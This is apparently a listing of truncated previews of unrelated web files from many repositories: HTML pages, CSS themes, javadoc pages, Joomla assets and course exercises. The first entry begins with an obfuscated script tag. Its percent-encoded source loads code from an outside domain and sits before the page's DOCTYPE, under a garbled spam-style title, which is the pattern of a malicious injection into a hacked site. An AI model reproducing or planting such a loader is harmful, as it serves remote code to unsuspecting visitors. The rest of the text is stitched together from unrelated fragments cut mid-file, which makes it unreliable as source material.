<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×...
tags/mysqldump/index.html
seanlook/seanlook.github.com
<!doctype html> <html class="theme-next mist use-motion" lang="en"> <head><meta name="generator" content="Hexo 3.9.0"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta http-equiv="Cache-C...
wp-content/themes/bordeaux-theme/css/parallax-slider-main-stylesheet.css
trantuanvn/coffeeletsgo
header, nav { display: block; position: relative; } img, a, *:focus { outline: none; } .c { text-align: center; } .l { text-align: left; } .r { text-align: right; } .j { text-align: justify; } .b { font-weight: bold; } .i { font-style: italic; } span.hl { font-weight: bold; color: #444; } .fl { f...
media/com_acymailing/css/module_default_classic_green.css
sumithMadhushan/joomla-project
/** * @package AcyMailing for Joomla! * @version 5.0.0 * @author acyba.com * @copyright (C) 2009-2015 ACYBA S.A.R.L. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ @import url("module_default_classic_black.css"); .acysubbuttons input.button, .acysubbutt...
RATAddOns/RATMozillaAddOn/data/createComment.html
ratplatform/RATPlatform
<!DOCTYPE HTML> <html> <head> <link href="jqtree.css" type="text/css" rel="stylesheet"> <script type="text/javascript" src="userDomains.js"></script> <script type="text/javascript" src="jquery-1.11.3.min.js"></script> <script type="text/javascript" src="tree.jquery.js"></script> </head> <body> <div id="tree1...
DXF2Machine/javadoc/myDXF/Entities/myBlockReference.html
cguagliano/D2M
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (version 1.7.0_71) on Wed Jun 17 16:34:24 ART 2015 --> <title>myBlockReference</title> <meta name="date" content="2015-06-17"> <link rel="style...
maraudersmApp/maraudersmApp/Html/Lymburn.html
EsriCanada-CE/ecce-app-challenge-2016
<!DOCTYPE html> <html> <head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'/> <meta name='viewport' content='width=device-width, height=device-height, initial-scale=1, maximum-scale=1, user-scalable=no'/> <link rel='stylesheet' href='http://cdn.leafletjs.com/leaflet/v1.0.0-beta.2/leaflet.css'/> <sc...
Schrodinger/Schrodinger_2017-1_docs/maestro_command_reference/phaseexportselectedligands.html
platinhom/ManualHom
<!DOCTYPE html> <html xmlns:MadCap="http://www.madcapsoftware.com/Schemas/MadCap.xsd" lang="en-US" xml:lang="en-US" data-mc-search-type="Stem" data-mc-help-system-file-name="Documentation.xml" data-mc-path-to-help-system="../" data-mc-target-type="WebHelp2" data-mc-runtime-file-type="Topic" data-mc-preload-images="fal...
src/008-Селекторы/002-Селекторы_по_тегам.html
MER-GROUP/HtmlAcademy
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Селекторы по тегам</title> <link rel="stylesheet" type="text/css" href="course1.css"> <link rel="stylesheet" type="text/css" href="002-CSS.css"> </head> <body> <ul class="target"> <li>1</li> ...
docHTML/bouml/class128515.html
yjegu/Projet_Comp
<!-- Documentation produced by the Html generator of Bouml (http://bouml.free.fr) --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Class Code3a</...
_variables/process_uid.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $process_uid</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print...
docs/symbols/2.0.1/tests/BT/assets/css/gui.css
WestpacCXTeam/GUI-source
/*! _colors v2.0.1 */ /* * SETTINGS */ .written-by { content: 'Dominik Wilkowski, Justin Spencer, Kate T MacDonald, Marita Purins, Daphne Bourne'; color: #BADA55; } /*! _fonts v2.0.1 */ /* * SETTINGS */ /* * SETTINGS */ .body-font { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Robot...
31 libs/jquery2.html
wenger67/LearnJS
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> <script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript"> function myFun () { $("#h01").attr('style', 'color:red').html("Some text and markup") } $(docume...
wp-content/themes/inceptio/css/colors/indigo.css
arkev/UM-Virtual
@charset "utf-8"; /* CSS Document */ /* ---------------------------------------------------------------------- */ /* Theme Information /* ---------------------------------------------------------------------- Name: Inceptio Description: Responsive Multi-Purpose Theme Author: Ixtendo Author URI: http://www.ixtendo.com...
libraries/commons-math3-3.4.1/docs/apidocs/org/apache/commons/math3/distribution/class-use/UniformRealDistribution.html
as-1/STSP
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>Uses of Class org.apache.commons.math3.distribution.UniformRealDistribution (Apache Commons Math 3.4...
wiki-oar/index.php?title=Special:UserLogin&returnto=Virtual_Cluster_GSOC_2010.html
oar-team/website-archive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" ...
html/dir_f16ab0736a58574b12a7ccdcc9da748c.html
kainagel/teach-oop
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" con...
doc/html/qsimgenericaccess-members.html
muromec/qtopia-ezx
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>List of All Members for QSimGenericAccess</title> <link href="classic.css" rel="stylesheet" type="text/c...
doc/ctgb_html/12837.html
ivorbosloper/pestileaks
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>A</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CONTENT="Ministerie van Landbouw, Natuurbeheer en Visserij"> <META NAME="C...
media/com_acymailing/css/acymenu.css
davidguillemet/fashionphotosub
/** * @package AcyMailing for Joomla! * @version 5.5.0 * @author acyba.com * @copyright (C) 2009-2016 ACYBA S.A.R.L. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ #acymenu_leftside{ z-index: 50; overflow:hidden; } .iconsonly #acymenu_lefts...
galaktika-parent/galaktika-ejb/src/main/webapp/templates/ship-edit.html
kukulis/galaktika
<h3>Ship (group) </h3> <p><a href="#/ship-list?fleetId={{controller.fleetId}}">Back to ships list</a></p> <small> Notice when editing, you can't change ship stats, only amount in the group. Only when creating new ship, you can input custom ship parameters. </small> <form> <fieldset class="form-group"> <label for="...
doc/ctgb_html/12581.html
ivorbosloper/pestileaks
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=utf-8"> <TITLE>WGGA bij het besluit Ctgb lijst gewasbeschermingsmiddelen en biociden 2007</TITLE> <META NAME="GENERATOR" CONTENT="LibreOffice 3.5 (Linux)"> <META NAME="AUTHOR" CO...
Code/GetMetaDataFromCRAN/raw_html/varSelRF.html
esander91/NamespacePollution
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CRAN - Package varSelRF</title> <link rel="stylesheet" type="text/css" href="../../CRAN_web.css" /> <meta http-equiv="Content-Type" content="text/html; ...